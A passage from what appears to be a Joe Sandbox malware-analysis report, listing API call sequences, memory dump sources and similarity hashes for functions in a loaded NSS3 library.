                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?), ref: 6C473CC9
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C473CD6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C473CE6
                                                                                                                                                                                                                                                      • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C473CF6
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C473D03
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C473D15
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1376842649-0
                                                                                                                                                                                                                                                      • Opcode ID: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
                                                                                                                                                                                                                                                      • Instruction ID: dec37ac7a78f4657409fe128189a0dd0f2ec1b51f5bae679914ffa708447dd8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1550bde22533cf8fe35c15584988cd996f0913420ab340266378a70d1f4e9c0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6112C7AE41514A7EB11A724EC05DE67A38EB0225DF160134ED1843B11F722ED58C7E5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B862
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B869
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B88A
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B891
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6C58798A), ref: 6C58B8B9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58B8C0
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E1
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AF9,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58B8E8
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2988086103-0
                                                                                                                                                                                                                                                      • Opcode ID: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
                                                                                                                                                                                                                                                      • Instruction ID: 412f42208b9467f626ac00b7c5358d745b5cfe88545c31a079185b238a5da65b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d4b2953fb45cfef5349d5d845ae26efd17092d3e787e35de6eb57bcb15c45c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 411100B2A02B209BDF10EFA0DC0C74A3778BB0A754F464118E51657A40D335BA4ACBDD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4911C0: PR_NewLock.NSS3 ref: 6C491216
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C479E17
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E25
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C479E4E
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C479EA2
                                                                                                                                                                                                                                                        • Part of subcall function 6C489500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C489546
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C479EB6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C479ED9
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C479F18
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3381623595-0
                                                                                                                                                                                                                                                      • Opcode ID: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
                                                                                                                                                                                                                                                      • Instruction ID: d39485737f38312b1e3675c72573b52997b12688e31101f88bb073e1cf0e9f68
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4dee840f530c43538a817539e29616e92b15f98ce126a534711e51c2ca1623a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1781D3B5A01601ABEB20DF34DC40EEB77A9BF65249F14452CE84987B41FB32E918C7E1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C48DCFA
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C48DD0E
                                                                                                                                                                                                                                                      • PK11_IsFriendly.NSS3(?), ref: 6C48DD73
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C48DD8B
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48DE81
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48DEA6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C48DF08
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 519503562-0
                                                                                                                                                                                                                                                      • Opcode ID: 645683326e1885176028d8363355449212e70c1d0c082ddff2e501810e8de2b6
                                                                                                                                                                                                                                                      • Instruction ID: c477bc6eb0bde857e6f873ce927cc66269ff2c27293b168c7154314a734d1f3a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 645683326e1885176028d8363355449212e70c1d0c082ddff2e501810e8de2b6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB91C1B5A031069FDB00CF68C881FAAB7B1BF44309F15406ADD199BB41EB31E945CBE1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460AB
                                                                                                                                                                                                                                                      • sqlite3_config.NSS3(00000004,6C594CA4,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C4460EB
                                                                                                                                                                                                                                                      • sqlite3_config.NSS3(00000012,6C594CC4,?,?,6C52BB62,00000004,6C594CA4,?,?,00000000,?,?,6C4031DB), ref: 6C446122
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C446095
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C4460A4
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C44609F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_config$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
                                                                                                                                                                                                                                                      • API String ID: 1634735548-648709467
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3F51BB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3F51A5
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C3F51B4
                                                                                                                                                                                                                                                      • unable to delete/modify user-function due to active statements, xrefs: 6C3F51DF
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C3F51AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_logstrlen
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                      • API String ID: 3619038524-4115156624
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF4B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF6F
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF81
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFF8D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4DFFA3
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C4DF165,6C5A219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4DFFC8
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C4DF165,?), ref: 6C4E00A6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 204871323-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49DF37
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C49DF4B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DF96
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C49E02B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C49E07E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C49E090
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C49E0AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4073542275-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC35
                                                                                                                                                                                                                                                        • Part of subcall function 6C49CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C49CF16
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C4BAB3E,?,?,?), ref: 6C4BAC55
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E,?,?), ref: 6C4BAC70
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E33C
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E350
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: PR_Unlock.NSS3(?), ref: 6C49E5BC
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C49E5CA
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: TlsGetValue.KERNEL32 ref: 6C49E5F2
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: EnterCriticalSection.KERNEL32(?), ref: 6C49E606
                                                                                                                                                                                                                                                        • Part of subcall function 6C49E300: PORT_Alloc_Util.NSS3(?), ref: 6C49E613
                                                                                                                                                                                                                                                      • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C4BAC92
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4BAB3E), ref: 6C4BACD7
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6C4BAD10
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C4BAD2B
                                                                                                                                                                                                                                                        • Part of subcall function 6C49F360: TlsGetValue.KERNEL32(00000000,?,6C4BA904,?), ref: 6C49F38B
                                                                                                                                                                                                                                                        • Part of subcall function 6C49F360: EnterCriticalSection.KERNEL32(?,?,?,6C4BA904,?), ref: 6C49F3A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C49F360: PR_Unlock.NSS3(?,?,?,?,6C4BA904,?), ref: 6C49F3D3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2926855110-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C498C7C
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C498CB0
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C498CD1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C498CE5
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C498D2E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C498D62
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C498D93
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3131193014-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D13F0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,?,?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C4D1445
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4D9C5B), ref: 6C4D9DDC
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C4D9C5B), ref: 6C4D9DFE
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C4D9C5B), ref: 6C4D9E91
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6C4CFAAB,00000000), ref: 6C4D157E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C4CFAAB,00000000), ref: 6C4D1592
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: memset.VCRUNTIME140(?,00000000,?), ref: 6C4D1600
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: PL_ArenaRelease.NSS3(?,?), ref: 6C4D1620
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1560: PR_Unlock.NSS3(?), ref: 6C4D1639
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3425318038-0
                                                                                                                                                                                                                                                      • Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                      • Instruction ID: 4249a386122c0e3bff33582ebc2076fae071e19c48697e2a3ba946ac015d321d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90416DB4501606AFE740EF55D860F92BBA1BF55359F158128D8188BFA1EB73F834CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C49DDEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6C49DE70
                                                                                                                                                                                                                                                      • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C49DE83
                                                                                                                                                                                                                                                      • HASH_ResultLenByOidTag.NSS3(?), ref: 6C49DE95
                                                                                                                                                                                                                                                      • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C49DEAE
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49DEBB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49DECC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
